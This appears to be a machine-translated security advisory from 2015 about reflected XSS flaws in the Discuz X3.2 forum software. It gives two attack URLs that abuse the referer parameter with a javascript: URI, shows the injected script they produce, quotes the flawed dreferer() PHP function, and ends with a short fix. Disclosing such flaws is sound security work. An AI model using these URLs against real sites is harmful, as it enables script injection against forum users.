Disucz X3. 2 multiple reflected XSS vulnerability, a function of the defect leads to the-vulnerability warning-the black bar safety net

2015-06-06T00:00:00
ID MYHACK58:62201563299
Type myhack58
Reporter 佚名
Modified 2015-06-06T00:00:00

Description

A function defect caused by XSS.

Detailed description:

member. php? mod=logging&action=login&referer=javascript://www. discuz. net/

code area

<p>welcome back, Newbie xx, it will now be transferred to the login page<script type="text/javascript" reload="1">setTimeout("window. location. href ='javascript://www. discuz. net/';", 2 0 0 0);setTimeout("window. location. href ='javascript://www. discuz. net/';", 2 0 0 0);</script></p>

<p class="alert_btnleft"><a href="javascript://www. discuz. net/">if your browser does not automatically jump, please click on this link</a></p>

connect. php? receive=yes&mod=login&op=callback&referer=javascript://www. discuz. net/

code area

<p>sorry, currently there are network problems or server busy, detailed error: connect_error_code_0 error code:<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">the openId signature invalid</a>, please wait then try again. Thank you.< script type="text/javascript" reload="1">setTimeout("window. location. href ='javascript://www. discuz. net/';", 2 0 0 0);</script></p>

<p class="alert_btnleft"><a href="javascript://www. discuz. net/">if your browser does not automatically jump, please click on this link</a></p>

source/function/function_core.php:

code area

function dreferer($default = ") {

......

if(strpos($_G['referer'], 'member. php? mod=logging')) {

$_G['referer'] = $default;

}

$reurl = parse_url($_G['referer']);

if(! empty($reurl['host']) && ! in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$ _SERVER['HTTP_HOST'])) && ! in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$ reurl['host']))) {

if(! in_array($reurl['host'], $_G['setting']['domain']['app']) && ! isset($_G['setting']['domain']['list'][$reurl['host']])) {

$domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+ 1);

if(empty($_G['setting']['domain']['root']) || (is_array($_G['setting']['domain']['root']) && ! in_array($domainroot, $_G['setting']['domain']['root']))) {

$_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php';

}

}

} elseif(empty($reurl['host'])) {

$_G['referer'] = $_G['siteurl'].'./'.$ _G['referer'];

}

$_G['referer'] = durlencode($_G['referer']);

return$_G['referer'];

}

This code uses parse_url to parse the referer after you get the host with $_SERVER['HTTP_HOST'] were compared to determine whether the station, but since this function itself is not to do validity testing, so the use of js URI can bypass the domain detection performs JS.

Vulnerability proof:

!

Repair solutions:

Use parse_url to parse after doing a validity test.